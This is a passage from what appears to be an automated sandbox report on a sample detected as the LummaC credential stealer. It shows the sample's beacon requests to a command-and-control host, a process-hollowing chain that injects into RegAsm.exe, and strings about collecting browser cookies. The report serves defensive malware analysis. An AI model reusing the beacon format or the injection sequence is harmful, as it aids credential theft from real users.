2024-12-18 10:40:34 UTC	15331	OUT	Data Raw: 99 77 51 46 6f 9c 5b 1f d9 93 1e 1a 75 5f 7f 5c 1b cf 9e c8 a8 9e 54 f4 47 cc f2 32 73 d9 b1 b4 8b 56 bd 97 66 5d 5e 96 40 82 a0 c3 bc f4 4d ac 61 47 17 23 9f 94 44 b0 86 70 27 dd f1 f7 3a c2 a2 03 8b d2 51 2d fe 66 26 11 75 e5 93 b5 22 92 61 bd a9 45 4e 1e db da 51 1e ff 52 30 8b 8f 21 82 99 c9 83 1e fc f5 4c 7f e1 d9 02 13 c5 5f cb cd 63 98 42 68 e5 f0 ca 69 60 75 02 27 68 06 e0 d8 ff f6 81 4b 71 29 0f 26 df ba 26 11 cf bb 56 c9 0a 4e 86 cc b0 54 d5 26 b6 bf 81 b1 69 05 ca c2 f5 3a c7 c5 4c 4f dd cd fb 27 00 7e 18 bc ff 5f a5 74 d3 86 fa 1e 43 44 af 3f ae fe fa 22 67 70 49 89 b7 72 82 e6 02 85 40 f1 07 87 e9 2f 8f 4b 5d 4a 7f f8 94 7a 4d 40 80 48 7a c4 0d 60 8f bd 73 09 a7 d3 7e 04 0c d2 3f 04 0c fd 9b 3f e2 6b de 73 63 a1 9e c4 af 62 16 df 47 75 99 c4 Data Ascii: wQFo[u_\TG2sVf]^@MaG#Dp':Q-f&u"aENQR0!L_cBhi`u'hKq)&&VNT&i:LO'~_tCD?"gpIr@/K]JzM@Hz`s~??kscbGu
2024-12-18 10:40:34 UTC	15331	OUT	Data Raw: 3c 56 03 7c 5c 76 05 26 1a 48 ca ec 9a 0d 2e 4f c7 7a fc 0b 4f 2e 56 59 d2 33 9b 22 79 df bb 75 5a 22 2a 5e 03 54 8d 6d 95 a4 7f 5e 26 07 48 71 1a f6 fd b7 ad b4 95 6b f9 67 e6 4e 35 39 70 a8 a2 99 fb a3 e2 97 d2 fd c5 37 46 e9 21 93 77 61 13 91 03 da 04 13 81 1e 12 6a 6c f8 21 79 2a 71 e7 57 6d e2 e2 5c ba 38 e8 e0 8e b0 3d 8a 56 2b 87 ab 57 27 0f 7e 5a fe 2e ec bd f0 6c 2a 52 ce 6b 75 f2 bb f7 b7 27 5a a6 cf 4f dc bd 57 54 bb f1 f6 5a ed 24 f6 d3 e8 ab 91 72 ff 76 76 4b f5 66 d7 91 4f 3e eb 67 98 dd ae 23 5f 1d 76 ef fe 40 4a 03 fa ea c8 8c 2c 38 67 8b 8e ab 4f 5a 8e 07 70 ce bb 6b 9f da aa 39 bc f9 f0 cb ce d9 3f c9 68 a3 fc 73 e8 f0 75 26 d7 1b 82 3e 43 94 f1 9f b7 aa 5c 21 7a a0 39 ed 3f 3e d0 2c bb 1b e8 b3 60 b4 b2 fe ef 10 f1 c0 2c 12 24 4a b6 bd Data Ascii: <V\|\v&H.OzO.VY3"yuZ"^Tm^&HqkgN59p7F!wajl!yqWm\8=V+W'~Z.l*Rku'ZOWTZ$rvvKfO>g#_v@J,8gOZpk9?hsu&>C\!z9?>,`,$J
2024-12-18 10:40:36 UTC	1040	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:40:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=r9u6mb2s2j7h7hol1qfilb17o0; expires=Sun, 13-Apr-2025 04:27:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DSzNA8UPjC38Tn6EH8OPwwLFBcGUlS3xuhIP1zARNTYFp%2FzV1gu85hlHAam3xP5JYmgiR%2FNI8e4bMSWqsyoUtbUsgc8ke4bx44fSbXWMPcRIqk7PrRQSkq8s7FHCVKjqaqo%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e89167d0d43f4-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1547&rtt_var=603&sent=361&recv=606&lost=0&retrans=0&sent_bytes=2834&recv_bytes=585837&delivery_rate=1779402&cwnd=194&unsent_bytes=0&cid=ff0477766fb09bb2&ts=2653&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49747	104.21.66.86	443	1412	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-18 10:40:37 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 89 Host: lev-tolstoi.com
2024-12-18 10:40:37 UTC	89	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 62 76 6e 71 67 65 6d 78 66 79 79 6f 26 6a 3d 26 68 77 69 64 3d 36 35 35 36 42 34 32 37 39 38 45 32 41 45 42 37 43 42 39 43 38 39 36 36 39 30 41 36 41 32 39 31 Data Ascii: act=get_message&ver=4.0&lid=LPnhqo--bvnqgemxfyyo&j=&hwid=6556B42798E2AEB7CB9C896690A6A291
2024-12-18 10:40:38 UTC	1042	IN	HTTP/1.1 200 OK Date: Wed, 18 Dec 2024 10:40:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hg23th37uudrdcfte54vldo7t7; expires=Sun, 13-Apr-2025 04:27:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ubtK%2FwmgfNkCFvelKykOf3%2FQMEA5znYScmJYMeVbmTO%2Bosna1kqVlQC9xrSAfV%2BXxrj5jpmJdZLFdxm5XdiMHmM1%2BncTQvpnG31vHiDXupoNN1Gd%2BGv%2BUdDqwkI5bkFgTUw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3e892f3df20c7a-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1498&min_rtt=1492&rtt_var=572&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=988&delivery_rate=1889967&cwnd=200&unsent_bytes=0&cid=a6dbb7d226e0934b&ts=797&x=0"
2024-12-18 10:40:38 UTC	54	IN	Data Raw: 33 30 0d 0a 71 6b 76 50 71 2f 69 54 64 77 63 73 41 66 57 64 59 44 48 32 37 48 43 48 63 53 49 59 2b 62 43 57 59 47 55 48 44 34 36 48 73 72 44 78 46 67 3d 3d 0d 0a Data Ascii: 30qkvPq/iTdwcsAfWdYDH27HCHcSIY+bCWYGUHD46HsrDxFg==
2024-12-18 10:40:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	4
Start time:	05:40:09
Start date:	18/12/2024
Path:	C:\Users\user\Desktop\5_6253708004881862888.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\5_6253708004881862888.exe"
Imagebase:	0xae0000
File size:	319'488 bytes
MD5 hash:	62DAD59C8A4BF1E860671C00D12D6BAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000004.00000002.1276608961.0000000003F75000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	05:40:09
Start date:	18/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75da10000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	05:40:10
Start date:	18/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0x9b0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	07:22:01
Start date:	18/12/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 1412 -s 1852
Imagebase:	0xf80000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	45%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	28%
Total number of Nodes:	25
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02F7217D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02F720EF,02F720DF), ref: 02F722EC
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02F722FF
Wow64GetThreadContext.KERNEL32(000002E8,00000000), ref: 02F7231D
ReadProcessMemory.KERNELBASE(000002EC,?,02F72133,00000004,00000000), ref: 02F72341
VirtualAllocEx.KERNELBASE(000002EC,?,?,00003000,00000040), ref: 02F7236C
WriteProcessMemory.KERNELBASE(000002EC,00000000,?,?,00000000,?), ref: 02F723C4
WriteProcessMemory.KERNELBASE(000002EC,00400000,?,?,00000000,?,00000028), ref: 02F7240F
WriteProcessMemory.KERNELBASE(000002EC,05050F18,?,00000004,00000000), ref: 02F7244D
Wow64SetThreadContext.KERNEL32(000002E8,01400000), ref: 02F72489
ResumeThread.KERNELBASE(000002E8), ref: 02F72498

Strings

SetThreadContext, xrefs: 02F722A3
CreateProcessA, xrefs: 02F72231
aryA, xrefs: 02F721C3
WriteProcessMemory, xrefs: 02F72290
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 02F722EB
ReadProcessMemory, xrefs: 02F7226A
VirtualAlloc, xrefs: 02F72244
TerminateProcess, xrefs: 02F7237B
VirtualAllocEx, xrefs: 02F7227D
GetP, xrefs: 02F721FF
GetThreadContext, xrefs: 02F72257
ress, xrefs: 02F72207
Load, xrefs: 02F721BB
ResumeThread, xrefs: 02F722B9

Memory Dump Source

Source File: 00000004.00000002.1273459374.0000000002F71000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F71000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2f71000_5_6253708004881862888.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: d0ea801c5dda4f27776881cc87a9be92c53e60d330e58d5a72009be0739e87fd
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: BBB1E57264028AAFDB60CF68CC80BDA77A5FF88714F158525EA0CAB341D774FA41CB94

Function 013E0AD7 Relevance: 1.8, APIs: 1, Instructions: 269
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,03F73590,?,?,?), ref: 013E0DDC

Memory Dump Source

Source File: 00000004.00000002.1273317761.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13e0000_5_6253708004881862888.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: c6c58ecd37bcf9f8ea781bb6817f694010543419e9dac790d8f2ef41068145b2
Instruction ID: e3e478f8bfe4f6ab8cb9068a0aeccfa87130a2112f3614b170f31c844e31b847
Opcode Fuzzy Hash: c6c58ecd37bcf9f8ea781bb6817f694010543419e9dac790d8f2ef41068145b2
Instruction Fuzzy Hash: 03B1A271A003698FCB15CF6DC4846EEFBF1BF49318F188599E459AB292C375AD41CBA0

Function 013E04B0 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,03F73590,?,?,?), ref: 013E0DDC

Memory Dump Source

Source File: 00000004.00000002.1273317761.00000000013E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_13e0000_5_6253708004881862888.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 08e92b955dfc5770bfd3497e4d67c18ff36f04294bf36569ca4fb3f09406db6c
Instruction ID: 5c5cd0b81cde3a4029a214a15e8be7fb8d02103906cbe4cf754e5f8ac01f0b86
Opcode Fuzzy Hash: 08e92b955dfc5770bfd3497e4d67c18ff36f04294bf36569ca4fb3f09406db6c
Instruction Fuzzy Hash: CE21D0B5D0125DEBCB10DF9AD884ADEFBB4FB48314F50812AE918A7240C375A954CBA1

Analysis Process: RegAsm.exePID: 1412, Parent PID: 2352COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	57.7%
Total number of Nodes:	352
Total number of Limit Nodes:	36

Executed Functions

Function 00426AA0 Relevance: 26.0, APIs: 5, Strings: 8, Instructions: 3266COMMON

Download Yara Rule

Strings

6b7`, xrefs: 00427A85
LKJI, xrefs: 00428A4F
P.<, xrefs: 00427F77
h[_H, xrefs: 004284C8
=Pq, xrefs: 004293AC
I4D, xrefs: 00426B56
hxl', xrefs: 00427986
LXXd, xrefs: 00427648

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 6b7`$I4D$LKJI$LXXd$P.<$h[_H$hxl'$=Pq
API String ID: 0-2764202004
Opcode ID: cb04d29209d9787272ba4c295e25597829dc89b3a74fed6d55f3e8625f3c704a
Instruction ID: b8098637fcb03f75d283751ab11d5dfc45763c73e8e77b80b4893e5d25295667
Opcode Fuzzy Hash: cb04d29209d9787272ba4c295e25597829dc89b3a74fed6d55f3e8625f3c704a
Instruction Fuzzy Hash: 4643D170205B928BE325CF39D4907A7FBE1AF16304F58496ED4EB8B792C739A405CB58

Function 0041434A Relevance: 20.8, Strings: 16, Instructions: 780
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

kh, xrefs: 00414A0B
hdoe, xrefs: 0041435A
j, xrefs: 00415180
WU, xrefs: 0041436A
ufd!, xrefs: 0041529A
)W+U, xrefs: 00414AC7
b7G5, xrefs: 00414B06
JONM, xrefs: 00414362
[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser, xrefs: 00415310
-, xrefs: 00414371
ohlf, xrefs: 004143A6
<OlM, xrefs: 00414A97
yvq|, xrefs: 0041528A
s2jl, xrefs: 00415292
I3I1, xrefs: 00414A8F
lnj", xrefs: 00414352

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: )W+U$-$<OlM$I3I1$JONM$WU$[info] collected cookies file of the chromium-based browser[info] collected cookies file of the chromium-based browser$b7G5$hdoe$j$kh$lnj"$ohlf$s2jl$ufd!$yvq|
API String ID: 0-1914954831
Opcode ID: 36358b0f130c028e60687d4b221fb7754a85c5993cad879d29c1f2c458fa3d7e
Instruction ID: f2fc54068ac55650b4244fefcfab8e8b44f54a2cce93e9c5ae518184fbbf7fc3
Opcode Fuzzy Hash: 36358b0f130c028e60687d4b221fb7754a85c5993cad879d29c1f2c458fa3d7e
Instruction Fuzzy Hash: 733275B450C3409BC310DF18D490A6BFBE1EFD6758F148A2DE4C98B362D3399995CB9A

Function 0040A670 Relevance: 20.4, Strings: 16, Instructions: 379
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

MY@[, xrefs: 0040AAEC
jhjn, xrefs: 0040A9A6
^=C?, xrefs: 0040AA8F
0, xrefs: 0040A6C4
TU, xrefs: 0040AAF7
^)V+, xrefs: 0040AA77
<M2O, xrefs: 0040AAB5
?I)K, xrefs: 0040AAC0
6556B42798E2AEB7CB9C896690A6A291, xrefs: 0040A792
2A0C, xrefs: 0040AAD6
E%T', xrefs: 0040AA7F
H5K7, xrefs: 0040AA9F
!]o_, xrefs: 0040AAE1
p9w;, xrefs: 0040AA97
}1K3, xrefs: 0040AAAA
=E;G, xrefs: 0040AACB

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: !]o_$0$2A0C$6556B42798E2AEB7CB9C896690A6A291$<M2O$=E;G$?I)K$E%T'$H5K7$MY@[$TU$^)V+$^=C?$jhjn$p9w;$}1K3
API String ID: 0-801408973
Opcode ID: c2e7905a2bbbcf3c1ef1d1a414cb5e1c215f064059c10fff3de179ce2023cf08
Instruction ID: aff48de567aba1499f892edbcdff5ba3d2f68cdfd752d0a397393d9c55e05f4d
Opcode Fuzzy Hash: c2e7905a2bbbcf3c1ef1d1a414cb5e1c215f064059c10fff3de179ce2023cf08
Instruction Fuzzy Hash: E3F114B02083809BD315DF19C490A2BBBE5EF89748F048E2DE1D99B391D7399915CB5B

Function 0040AC10 Relevance: 19.8, APIs: 2, Strings: 9, Instructions: 595
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

lev-tolstoi.com, xrefs: 0040B14F, 0040B3A6
{5x7, xrefs: 0040AF63
k%t', xrefs: 0040AF83
}1|3, xrefs: 0040AF6B
l!q#, xrefs: 0040AF8B
ww, xrefs: 0040AF0B
b], xrefs: 0040B06F
a)c+, xrefs: 0040AF7B
6556B42798E2AEB7CB9C896690A6A291, xrefs: 0040B18A

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 6556B42798E2AEB7CB9C896690A6A291$a)c+$b]$k%t'$l!q#$lev-tolstoi.com$ww${5x7$}1|3
API String ID: 0-2524722598
Opcode ID: fbd5f78b2f6756926a12d15283a555596604101a06d45c3cc70747ef2a2daf90
Instruction ID: de0e0c269fa983ed670699c7f7adeed625eb37e840516ca8ec504eb0ea6c85d9
Opcode Fuzzy Hash: fbd5f78b2f6756926a12d15283a555596604101a06d45c3cc70747ef2a2daf90
Instruction Fuzzy Hash: AE12DEB05083419BD7119F15D89076BBBE1EF92304F188A2EE8C56B392D7398905DF9A

Function 00427554 Relevance: 14.8, APIs: 3, Strings: 5, Instructions: 795COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNEL32(00000006,00000000,00000200), ref: 00427C80
GetComputerNameExA.KERNEL32(00000005,00000000,00000200), ref: 00427D6F

Strings

6b7`, xrefs: 00427A85
LKJI, xrefs: 00428A4F
P.<, xrefs: 00427F77
h[_H, xrefs: 004284C8
=Pq, xrefs: 004293AC
I4D, xrefs: 00426B56
hxl', xrefs: 00427986
LXXd, xrefs: 00427648

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ComputerName
String ID: 6b7`$I4D$LKJI$LXXd$P.<$h[_H$hxl'$=Pq
API String ID: 3545744682-2764202004
Opcode ID: 9bc24c193e080d67e928041a4eb608ada65b089d4dccca76a9f0bc83f918b78e
Instruction ID: f3971b5cb5e7e3424a77d74c3744998f1015ec71b3621e64faf3843f807432c9
Opcode Fuzzy Hash: 9bc24c193e080d67e928041a4eb608ada65b089d4dccca76a9f0bc83f918b78e
Instruction Fuzzy Hash: 54524A70148B928EE325CB39D450BE7BBE1AF16305F84496ED4EB8B282D7397505CFA4

Function 0041C560 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 474
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

}r, xrefs: 0041CBA8
/F1@, xrefs: 0041CC21, 0041CB16, 0041CC30
LB, xrefs: 0041C853
m~, xrefs: 0041CBB8
g~, xrefs: 0041CBB0
?\, xrefs: 0041C873

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: /F1@$?\$g~$m~$}r$LB
API String ID: 0-1323940199
Opcode ID: f3c53cf11a3174a59c3d35ce1804877a360db846f1234a6b1c5ea6c5ac0db85d
Instruction ID: 0e9b1304909c75ebd789e57c80764145fd75e33326bbd7b8acd21fbea0b69cbc
Opcode Fuzzy Hash: f3c53cf11a3174a59c3d35ce1804877a360db846f1234a6b1c5ea6c5ac0db85d
Instruction Fuzzy Hash: FE0221B01083809BD310DF59D890A2BBBE1EF86748F108E1DE1D98B361D3799985CB9A

Function 0040B9F0 Relevance: 11.9, Strings: 9, Instructions: 606
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

57, xrefs: 0040BB78
=0, xrefs: 0040C6C7
s?, xrefs: 0040BC40
:(, xrefs: 0040C6BD
9y{, xrefs: 0040BAD2
SK, xrefs: 0040BC2C
qs, xrefs: 0040BAE0
::, xrefs: 0040C6B3
K}, xrefs: 0040BC36

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 9y{$:($::$=0$K}$SK$s?$57$qs
API String ID: 0-801180625
Opcode ID: 001b5e2a4ad736682162ddd6aa6706a4b9ae126d701e6e6178211efe32df56db
Instruction ID: 17ccc9dbf3745df6cb0e7f151c817ad0fae5720ae9930f5834a18b563d715aad
Opcode Fuzzy Hash: 001b5e2a4ad736682162ddd6aa6706a4b9ae126d701e6e6178211efe32df56db
Instruction Fuzzy Hash: 415253B4500B01CFD324CF65D985B96BBB1FB45304F268AACC5AA6F7A2C774A405CF98

Function 00413F33 Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 357
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4`[b, xrefs: 00414320
'/',, xrefs: 00413FBC
@_, xrefs: 00413FDC
/'/T, xrefs: 00413FCC

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: '/',$/'/T$4`[b$@_
API String ID: 0-1318191642
Opcode ID: 4daf07612b40e693dd44633998bab565447f0dc4d9d7c0eeb1b1a1a2d4751e14
Instruction ID: 6b971978264f377686030c6eb2f81426e204398841c2fa4c128c0a9ca95485f7
Opcode Fuzzy Hash: 4daf07612b40e693dd44633998bab565447f0dc4d9d7c0eeb1b1a1a2d4751e14
Instruction Fuzzy Hash: B4B10FB5908341DFC714DF28D89166FBBE2ABDA304F04492EF59587382D338D945CB8A

Function 0043D6A2 Relevance: 5.8, Strings: 4, Instructions: 780COMMON

Download Yara Rule

Strings

%sgh, xrefs: 0043D730
%"! , xrefs: 0043D893, 0043D866
4`[b, xrefs: 0043DB30
4`[b, xrefs: 0043DBE0

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: %"! $%sgh$4`[b$4`[b
API String ID: 0-2792481892
Opcode ID: 4bb0268e748aca099bc6973a47522aa803c64f36e5a0186f9bd3feef07210487
Instruction ID: 2875e28172492f2dd36f19507e7d2b3e0ef7b73b3dc7bb8c170ab07732175fb5
Opcode Fuzzy Hash: 4bb0268e748aca099bc6973a47522aa803c64f36e5a0186f9bd3feef07210487
Instruction Fuzzy Hash: D642AEB5A09341CFD314DF28E89062EB7E1FF9A305F15892DE582833A1C735E825CB5A

Function 00424D53 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 00424D9E
GetSystemMetrics.USER32 ref: 00424DAD

Strings

, xrefs: 00424E81

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 365337688-3916222277
Opcode ID: caf04abe748e05f920cb1af8def9116a0a4e6f877113dd1095bb7ed8cb94c812
Instruction ID: 15286c8ef8cd538b504b01284551794cec0744fe5c9f23e87630228807cee832
Opcode Fuzzy Hash: caf04abe748e05f920cb1af8def9116a0a4e6f877113dd1095bb7ed8cb94c812
Instruction Fuzzy Hash: C55170B4E14209DFDB40EFACD985A9EBBF0BB49700F118529E898E7350D734A945CF86

Function 0041F860 Relevance: 5.3, Strings: 4, Instructions: 306COMMON

Download Yara Rule

Strings

Fq, xrefs: 0042021C
4`[b, xrefs: 00420340
C, xrefs: 00420224
OQ, xrefs: 00420214

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$C$Fq$OQ
API String ID: 0-781182953
Opcode ID: 86aa9b4e288369f6f21f5823ebfd1e905914f365bdcf32938e5905083f686921
Instruction ID: 37c9e05d814abe5c1dde354d8d8aa1a9c3364344955bf3caafc80d6b890f897e
Opcode Fuzzy Hash: 86aa9b4e288369f6f21f5823ebfd1e905914f365bdcf32938e5905083f686921
Instruction Fuzzy Hash: 1AA19AB420C390DFD314DF18E89062BBBE1EB8A348F54492DE5D697262C3399965CB4B

Function 0043DC30 Relevance: 3.1, Strings: 2, Instructions: 617COMMON

Download Yara Rule

Strings

4`[b, xrefs: 0043DB30
4`[b, xrefs: 0043DBE0

Memory Dump Source

Source File: 00000008.00000002.1903512649.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID: 4`[b$4`[b
API String ID: 0-3640500014
Opcode ID: 6629c1fc605815616a947a61f4e5fbe8f3051a8ba21f43d3f35ef71638186f7f
Instruction ID: 9972b7ec3b07a3225a2260eac104033fed9068c35a8346db51552ba1129fbb87
Opcode Fuzzy Hash: 6629c1fc605815616a947a61f4e5fbe8f3051a8ba21f43d3f35ef71638186f7f
Instruction Fuzzy Hash: BC22E275A09241CFD714DF28E89062EB7E2FF9A305F15893DE492833A1C7349961CB9A

Function 0040EC7D Relevance: 3.0, Strings: 2, Instructions: 507COMMON

Download Yara Rule

Strings

5, xrefs: 0040F0FC
fp, xrefs: 0040EE24

Memory Dump Source

